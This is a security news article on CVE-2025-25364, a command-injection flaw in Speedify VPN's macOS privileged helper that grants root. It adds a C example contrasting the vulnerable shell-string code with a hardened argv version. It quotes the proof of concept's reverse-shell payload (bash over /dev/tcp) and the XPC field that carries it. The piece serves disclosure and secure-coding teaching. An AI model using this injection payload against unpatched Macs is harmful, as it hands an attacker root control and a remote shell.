Tuesday, May 6, 2025

Speedify VPN Vulnerability on macOS Exposes Users to System Takeover


A critical local privilege escalation flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, exposes its users to complete system compromise: any unprivileged local process can use it to obtain root.

Researchers at SecureLayer7 discovered the vulnerability in Speedify's privileged helper tool. A local attacker can use it to execute arbitrary commands as root and take full control of the affected Mac.

CVE-2025-25364: A Critical Command Injection Vulnerability

The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service, a helper tool that runs as root so that it can perform system-level network operations on behalf of the Speedify app.


This service, installed as a privileged launchd daemon at /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper (the standard location for helpers installed with SMJobBless), receives and processes commands from the main Speedify app over Apple's XPC inter-process messaging. An XPC Mach service registered with launchd is reachable by any local process unless the helper itself verifies the caller, so an attacker does not need to go through the Speedify app to talk to it.

Aspect              Details
CVE ID              CVE-2025-25364
Affected Product    Speedify VPN
Affected Version    15.0.0 (macOS)
Patched Version     15.4.1
Component           me.connectify.SMJobBlessHelper (privileged helper tool at /Library/PrivilegedHelperTools/)
Vulnerability Type  Command Injection

The helper does not validate the cmdPath and cmdBin fields of incoming XPC messages. Both values are embedded verbatim into a shell command line that the helper then executes with system(). Because /bin/sh parses that line, shell metacharacters in either field are interpreted, and a local attacker who crafts a message can inject arbitrary commands that run as root.

Three functions are at the heart of this vulnerability:

  1. XPC Message Handler: Accepts and parses incoming XPC messages and routes those carrying a "runSpeedify" request to a launch handler, without validating the caller or the message contents.
  2. _handleLaunchSpeedifyMsg: Extracts cmdPath and cmdBin directly from the message and initiates program execution.
  3. _RunSystemCmd: Builds a shell command line from these fields with asprintf() and passes it to system(). The decompiled line below is the injection point: the attacker-controlled value (in rcx) is substituted into the second %s, inside quotes that /bin/sh will parse, while the first %s is the expected certificate subject (elided in the published analysis):

rax = asprintf(&var_38, "codesign -v -R=\"certificate leaf[subject.CN] = \"%s\" and anchor apple generic\" \"%s\"", "…", rcx);

Note that this command is itself a code-signature check (codesign -v with a designated requirement), intended to verify the binary before launching it. Performing the check by way of a shell string turns the safeguard into the vulnerability.

A threat actor can set cmdBin (or cmdPath) to a string such as "; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo " to obtain a root reverse shell. The leading double quote closes the quoted path argument, the semicolon terminates the codesign command so that bash runs next, and the trailing echo " reopens a quote that absorbs the format string's final double quote, keeping the shell syntax valid. The PoC connects back to a listener on 127.0.0.1:1339; a real attacker would substitute a host under their control.
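The following is an added example, not Speedify's helper code and not the SecureLayer7 PoC. It models the _RunSystemCmd pattern described above in portable C (the same format string, fed to a shell) next to the form a hardened helper should use: validate the path, then run codesign with an argument vector via posix_spawnp so that no shell ever parses attacker data. The function names, the expected certificate CN ("Example Developer ID") and the harmless "INJECTED" marker payload are assumptions made for this demonstration; the reverse-shell string is the one quoted in the article.

```c
/* Added example, not Speedify's helper code and not the SecureLayer7 PoC: a
 * portable model of the _RunSystemCmd pattern beside a hardened variant that
 * never involves a shell. Function names, the expected CN and the "INJECTED"
 * marker payload are assumptions for this demo. Build: cc -o runcmd runcmd.c */
#define _POSIX_C_SOURCE 200809L
#define _DEFAULT_SOURCE
#include <ctype.h>
#include <spawn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>

extern char **environ;

/* The reverse-shell payload quoted in the article. */
const char *const SPEEDIFY_POC_PAYLOAD =
    "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";

/* Constructed, harmless payload of the same shape: the leading quote closes
 * the path argument, ';' ends the codesign command, and the trailing 'echo "'
 * reopens a quote so the format string's final '"' keeps the syntax valid. */
const char *const MARKER_PAYLOAD = "\"; echo INJECTED; echo \"";

/* VULNERABLE: same format string as the decompiled asprintf() call. cmd_bin
 * is spliced into text that system() would hand to sh -c. Returns 1 on success. */
int vuln_build_codesign_cmd(const char *expected_cn, const char *cmd_bin,
                            char *out, size_t outlen) {
    int n = snprintf(out, outlen,
                     "codesign -v -R=\"certificate leaf[subject.CN] = \"%s\" "
                     "and anchor apple generic\" \"%s\"",
                     expected_cn, cmd_bin);
    return n >= 0 && (size_t)n < outlen;
}

/* VULNERABLE: runs that string through a shell (popen, like system(), uses
 * sh -c) and copies what reached stdout. Even where codesign does not exist,
 * MARKER_PAYLOAD makes the shell print "INJECTED". Returns 1 if output was read. */
int vuln_run_and_capture(const char *expected_cn, const char *cmd_bin,
                         char *out, size_t outlen) {
    char cmd[2048], wrapped[2200];
    if (!vuln_build_codesign_cmd(expected_cn, cmd_bin, cmd, sizeof cmd)) return 0;
    snprintf(wrapped, sizeof wrapped, "( %s ) 2>/dev/null", cmd);
    FILE *fp = popen(wrapped, "r");
    if (!fp) return 0;
    memset(out, 0, outlen);
    size_t got = fread(out, 1, outlen - 1, fp);
    pclose(fp);
    return got > 0;
}

/* Defense in depth: only an absolute path over [A-Za-z0-9/._-] with no ".."
 * component. Both payloads above are rejected before anything executes. */
int is_acceptable_binary_path(const char *p) {
    if (!p || p[0] != '/' || strlen(p) >= 1024 || strstr(p, "..")) return 0;
    for (const char *c = p; *c; c++)
        if (!isalnum((unsigned char)*c) && !strchr("/._-", *c)) return 0;
    return 1;
}

/* HARDENED: build an argv vector instead of a command line. Each element is
 * passed to execve() as one argument, so metacharacters in cmd_bin are just
 * bytes in a file name. argv needs room for 5 pointers; req receives the -R=
 * requirement (expected_cn is the helper's own constant, never caller input).
 * Returns argc, or 0 on failure. */
int safe_build_codesign_argv(const char *expected_cn, const char *cmd_bin,
                             char **argv, char *req, size_t reqlen) {
    int n = snprintf(req, reqlen,
                     "-R=certificate leaf[subject.CN] = \"%s\" and anchor apple generic",
                     expected_cn);
    if (n < 0 || (size_t)n >= reqlen) return 0;
    argv[0] = "codesign";
    argv[1] = "-v";
    argv[2] = req;
    argv[3] = (char *)cmd_bin;
    argv[4] = NULL;
    return 4;
}

/* HARDENED: validate, then spawn codesign directly. Returns its exit status
 * (0 = the binary satisfies the requirement), or -1 if the path was rejected
 * or codesign could not be started (e.g. on Linux, where it does not exist). */
int run_codesign_check(const char *expected_cn, const char *cmd_bin) {
    char *argv[5];
    char req[512];
    pid_t pid;
    int status = 0;
    if (!is_acceptable_binary_path(cmd_bin)) return -1;
    if (!safe_build_codesign_argv(expected_cn, cmd_bin, argv, req, sizeof req)) return -1;
    if (posix_spawnp(&pid, argv[0], NULL, NULL, argv, environ) != 0) return -1;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *cn = "Example Developer ID"; /* assumed; the real CN is elided in the article */
    char cmd[2048], out[256], *argv[5], req[512];
    vuln_build_codesign_cmd(cn, SPEEDIFY_POC_PAYLOAD, cmd, sizeof cmd);
    printf("vulnerable command line:\n  %s\n", cmd);
    if (vuln_run_and_capture(cn, MARKER_PAYLOAD, out, sizeof out))
        printf("vulnerable path, shell stdout: %s", out);
    safe_build_codesign_argv(cn, SPEEDIFY_POC_PAYLOAD, argv, req, sizeof req);
    printf("hardened path, argv[3] stays one literal argument: %s\n", argv[3]);
    printf("payload accepted as a path: %s\n",
           is_acceptable_binary_path(SPEEDIFY_POC_PAYLOAD) ? "yes" : "no");
    printf("codesign check on /bin/ls: %d\n", run_codesign_check(cn, "/bin/ls"));
    return 0;
}
```

The path allowlist is only a backstop; the fix that matters is that the hardened path never constructs a shell command line, so the injection string reaches execve() as a single, inert argument. A production helper would additionally verify the connecting XPC client (for example by checking the peer's code signature via its audit token) before acting on any message, which the argv change does not address.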

Researchers released a proof-of-concept (PoC) exploit written in Objective-C. It uses the libxpc C API to connect to the vulnerable helper's Mach service and send a crafted "runSpeedify" message.

The payload triggers arbitrary code execution as root, in this case a reverse shell. The relevant part of the PoC is the two fields it sets on the outgoing message (the connection and message setup are not reproduced in the article):

// cmdPath is given a benign value; the injection rides in cmdBin
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);

The impact is critical. Any code already running as an ordinary user on the Mac, including malware delivered through a browser or a malicious download, can escalate to full root control, modify protected system files, install persistent malware, and exfiltrate data.

Since most Speedify VPN users rely on the app for privacy, the flaw undermined the security posture of a broad user base.

Speedify users are strongly advised to upgrade to version 15.4.1 or later, which addresses the flaw with a complete rewrite of the helper tool, stricter input validation, and removal of the insecure XPC handling. Because an SMJobBless helper is installed separately from the app bundle (under /Library/PrivilegedHelperTools with a matching launchd plist), administrators should confirm that the helper on disk was actually replaced by the update and not just the application.

The incident highlights the familiar rule for privileged code: validate every input, verify who is sending it, and execute programs with an argument vector rather than by assembling shell command lines.

Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
